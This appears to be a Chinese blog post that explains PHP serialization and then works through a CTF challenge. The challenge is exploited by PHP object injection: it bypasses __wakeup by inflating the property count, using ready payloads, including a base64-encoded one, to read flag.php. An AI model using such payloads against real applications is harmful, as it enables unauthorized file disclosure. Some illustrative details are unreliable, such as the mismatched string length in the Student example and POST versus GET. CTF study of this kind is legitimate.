PHP序列化与反序列化
serialize() ---> 函数用于序列化对象或数组,并返回一个字符串。
<?php
$sites = array('t1', 'tt2', 'ttt3');
$serialized_data = serialize($sites);
echo $serialized_data;
?>
output
a:3:{i:0;s:2:"t1";i:1;s:3:"tt2";i:2;s:4:"ttt3";}
a:表示整体的数据类型,这里是array;
a:4中的4:表示数组元素的个数;
i:表示int,整型;
0:表示数组元素的下标;
s:表示string,即数组值的类型;
s:3中3:表示数组值的长度。
serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方
<?php
$sites = array('t1', 'tt2', 'ttt3');
$serialized_data = serialize($sites);
#echo $serialized_data;
$unserialized_data = unserialize($serialized_data);
print_r($unserialized_data);
?>
output should be like this
Array
(
[0] => t1
[1] => tt2
[2] => ttt3
)
put into practice
利用 php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup等等。这些函数在某些情况下会自动调用,比如__construct当一个对象创建时被调用,__destruct当一个对象销毁时被调用,__toString当一个对象被当作一个字符串使用。
一句话解释,用膜法打败膜法
引入例题
<?php
class SoFun{
protected $file='index.php';
function __destruct(){
if(!empty($this->file))
{
//查找file文件中的字符串,如果有'\\'和'/'在字符串中,就显示错误
if(strchr($this->file,"\\")===false && strchr($this->file, '/')===false)
{
show_source(dirname (__FILE__).'/'.$this ->file);
}
else{
die('Wrong filename.');
}
}
}
function __wakeup()
{
$this-> file='index.php';
}
public function __toString()
{
return '';
}
}
if (!isset($_GET['file']))
{
show_source('index.php');
}
else{
$file=base64_decode( $_GET['file']);
echo unserialize($file );
}
?> #<!--flag in flag.php-->
审计代码,可以发现要得到flag ,思路如下:
- 源码最后提示,flag 在flag.php里面;
- 注意到__destruct中,有这么一段代码,将file文件内容显示出来
show_source(dirname(FILE).’/‘.$this->file)
作用就是将file文件内容显示出来
- 若POST“file”参数为序列化对象,且将file设为flag.php;那么可以通过unserialize反序列化,进而调用__destruct魔术方法来显示flag.php源码(要注意的是file参数内容需要经过base64编码);
- 上面的分析是多么美好,但从代码分析可以知道,还有__wakeup这个拦路虎,通过unserialize反序列化之后,也会调用__wakeup方法,它会把file设为index.php;
- 总结下来就是,想办法把file设为flag.php,调用__destruct方法,且绕过__wakeup。
PHP反序列化对象注入漏洞
上网查资料,发现原来这个CTF题目是根据PHP反序列化对象注入漏洞改编的。
简单来说,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。举个栗子,比如有个Student类,里面有个参数为name。 实际情况:O:7:”Student”:1:{S:4:”name”;s:8:”sqx”;} Payload:O:7:”Student”:2:{S:4:”name”;s:8:”sqx”;} Payload对象属性个数为2,而实际属性个数为1,那么就会掉入漏洞,从而跳过wakeup()方法。
简单来说,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。
payload = ?file=O:5:"SoFun":2:{s:11:"\00*\00file";s:8:"flag.php";}
或者
payload = _?file=O:5:"SoFun":2:{S:7:"\00*\00file";s:8:"flag.php";}_
经过base64加密后
payload = ?file=Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ==
得到flag
相关文章
- 如何通过xhprof分析性能
使用方法 xhprof_enable(); /** ... 要检查的php代码 ... **/ $xhprof_data = xhprof_disable(); // 引入xhprof_lib i
- LUMEN API Controller 规范
1. 第三方依赖库规范 在使用LUMEN实现API接口时,以下库必须需要包含在composer包依赖中,以实现代码编写的一些规范 dingo/api : 实现API接口库 vlucas/phpdo
- PHP文件锁
共享锁(LOCK_SH) 什么时候加共享锁? 当在读取数据的时候同时进行着其他的写操作,这个时候需要对文件加共享锁,否则无论有没有对写操作加写锁都会写入成功,导致数据不一致 当文件获得共享锁时,其他
- Hello-Risen-程序
首先需要说明的是,您下载到的文件包含两部分,其中src中是开发源码,用于对Risen框架本身的开发,risen 目录中是通过源码生成的包含debug和release版本的框架程序,用于您应用程序的开发
- PHP自定义类示例(Weixin消息解析类)
PHP自定义类示例(Weixin消息解析类) /** * Created by Qingger. * User: jsspf * Date: 2017/3/24 * Time: 10:50
随机推荐
- 如何通过xhprof分析性能
使用方法 xhprof_enable(); /** ... 要检查的php代码 ... **/ $xhprof_data = xhprof_disable(); // 引入xhprof_lib i
- LUMEN API Controller 规范
1. 第三方依赖库规范 在使用LUMEN实现API接口时,以下库必须需要包含在composer包依赖中,以实现代码编写的一些规范 dingo/api : 实现API接口库 vlucas/phpdo
- PHP文件锁
共享锁(LOCK_SH) 什么时候加共享锁? 当在读取数据的时候同时进行着其他的写操作,这个时候需要对文件加共享锁,否则无论有没有对写操作加写锁都会写入成功,导致数据不一致 当文件获得共享锁时,其他
- Hello-Risen-程序
首先需要说明的是,您下载到的文件包含两部分,其中src中是开发源码,用于对Risen框架本身的开发,risen 目录中是通过源码生成的包含debug和release版本的框架程序,用于您应用程序的开发
- PHP自定义类示例(Weixin消息解析类)
PHP自定义类示例(Weixin消息解析类) /** * Created by Qingger. * User: jsspf * Date: 2017/3/24 * Time: 10:50